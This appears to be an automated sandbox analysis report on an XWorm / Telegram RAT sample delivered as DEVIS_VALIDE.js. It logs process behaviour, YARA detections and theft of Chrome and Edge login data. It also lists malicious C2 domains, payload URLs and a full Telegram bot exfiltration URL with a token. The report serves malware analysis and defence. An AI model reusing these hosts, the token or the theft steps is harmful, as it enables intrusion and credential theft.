Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8224, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 53.2.powershell.exe.1d3333e0230.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.powershell.exe.1558669f3b8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.powershell.exe.1de3d91f608.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.1e6806fed08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.20ece618be0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.powershell.exe.1558669b658.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.powershell.exe.1558669f3b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.1e6806fed08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.1e6806fafa8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.20ece618be0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.20ece614e80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.powershell.exe.1de3d91b8a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 53.2.powershell.exe.1d3333e0230.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.powershell.exe.1de3d91f608.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 53.2.powershell.exe.1d3333dc4d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000002.2087880132.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2333261639.0000015586871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.2425933120.000001D3332B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2013251264.0000020ECE7E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.2425933120.000001D3335B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2333261639.000001558655B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2013251264.0000020ECE53D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2070695014.000001E6808CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2195585060.000001DE3D7DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2195585060.000001DE3DAEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2070695014.000001E6805BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2540, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8224, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8224, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 53.2.powershell.exe.1d3333e0230.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.powershell.exe.1558669f3b8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.powershell.exe.1de3d91f608.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.1e6806fed08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.20ece618be0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.powershell.exe.1558669b658.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.powershell.exe.1558669f3b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.1e6806fed08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.1e6806fafa8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.20ece618be0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.20ece614e80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.powershell.exe.1de3d91b8a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 53.2.powershell.exe.1d3333e0230.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.powershell.exe.1de3d91f608.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 53.2.powershell.exe.1d3333dc4d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000002.2087880132.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2333261639.0000015586871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.2425933120.000001D3332B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2013251264.0000020ECE7E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.2425933120.000001D3335B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2333261639.000001558655B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2013251264.0000020ECE53D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2070695014.000001E6808CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2195585060.000001DE3D7DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2195585060.000001DE3DAEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2070695014.000001E6805BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2540, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8224, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	32 Scripting	Valid Accounts	11 Windows Management Instrumentation	32 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	11 Archive Collected Data	2 Web Service	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	211 Process Injection	11 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	21 Obfuscated Files or Information	Security Account Manager	311 Security Software Discovery	SMB/Windows Admin Shares	1 Input Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	4 PowerShell	Login Hook	Login Hook	3 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	231 Virtualization/Sandbox Evasion	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	213 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	231 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	211 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DEVIS_VALIDE.js	8%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
http://crl.microsoftsl	0%	Avira URL Cloud	safe
https://masclauxtoitures.fr	0%	Avira URL Cloud	safe
https://masclauxtoitures.fr/X67h2024kNWORM.txtP	0%	Avira URL Cloud	safe
https://masclauxtoitures.fr/x67h2024knworm.txt	0%	Avira URL Cloud	safe
http://www.microsoft.i	0%	Avira URL Cloud	safe
http://ftp.desckvbrat.com.br	100%	Avira URL Cloud	malware
http://desckvbrat.com.br	100%	Avira URL Cloud	malware
http://masclauxtoitures.fr	0%	Avira URL Cloud	safe
moneyluckwork.ddns.net	100%	Avira URL Cloud	malware
http://crl.microsoftEO	0%	Avira URL Cloud	safe
moneyluck.duckdns.org	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
moneyluck.duckdns.org	178.73.218.6	true	true	unknown
paste.ee	188.114.97.3	true	false	high
masclauxtoitures.fr	64.235.43.128	true	true	unknown
desckvbrat.com.br	191.252.83.213	true	true	unknown
api.telegram.org	149.154.167.220	true	false	high
pastebin.com	104.20.3.235	true	false	high
ftp.desckvbrat.com.br	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://paste.ee/d/aGYNy/0	false		high
https://masclauxtoitures.fr/X67h2024kNWORM.txt	true		unknown
https://api.telegram.org/bot6063212727:AAGxI15ihXd3ydfdlrCIMNDRzM08Ew5M1gY/sendMessage?chat_id=1188038887&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A1F61296E2D13B1021028%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20WG6__62%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6	false		high
moneyluckwork.ddns.net	true	Avira URL Cloud: malware	unknown
https://pastebin.com/raw/GF0ptUGb	false		high
https://paste.ee/d/I1o5h/0	false		high
moneyluck.duckdns.org	true	Avira URL Cloud: malware	unknown
https://pastebin.com/raw/CPCMnN7k	false		high
https://paste.ee/d/Nbuiz/0	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://masclauxtoitures.fr/x67h2024knworm.txt	powershell.exe, 00000004.00000002.1992997309.00000177DA574000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	powershell.exe, 00000014.00000002.2013251264.0000020ECE7E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2013251264.0000020ECE53D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2070695014.000001E6808CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2070695014.000001E6805BB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000020.00000002.2087880132.0000000000402000.00000040.00000400.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2195585060.000001DE3D7DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2195585060.000001DE3DAEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2333261639.0000015586871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2333261639.000001558655B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2425933120.000001D3332B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2425933120.000001D3335B0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft	powershell.exe, 00000010.00000002.1926571545.00000220D1494000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2824594158.000001E6F71F8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2664986969.000001E6F4E75000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ftp.desckvbrat.com.br	powershell.exe, 00000004.00000002.1992997309.00000177DA44D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA140000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://desckvbrat.com.br	powershell.exe, 00000004.00000002.1992997309.00000177DA44D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://pastebin.com/raw	powershell.exe, 00000004.00000002.1992997309.00000177DA4C7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co	powershell.exe, 00000010.00000002.1926571545.00000220D1494000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2824594158.000001E6F71F8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000010.00000002.1930109525.00000220D4AEC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://analytics.paste.ee	powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA4A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D916E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D9130000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paste.ee	powershell.exe, 00000004.00000002.1992997309.00000177D91EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D8EE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA476000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoftsl	powershell.exe, 00000014.00000002.2002371682.0000020ECC1A4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com	powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA4A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D916E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D9130000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000010.00000002.1930109525.00000220D4AEC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.2087171202.000002B6AA552000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1977461538.0000024FF25A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3165334469.00000220E31E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3165334469.00000220E3327000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1930109525.00000220D4AEC000.00000004.00000800.00020000.00000000.sdmp	false		high
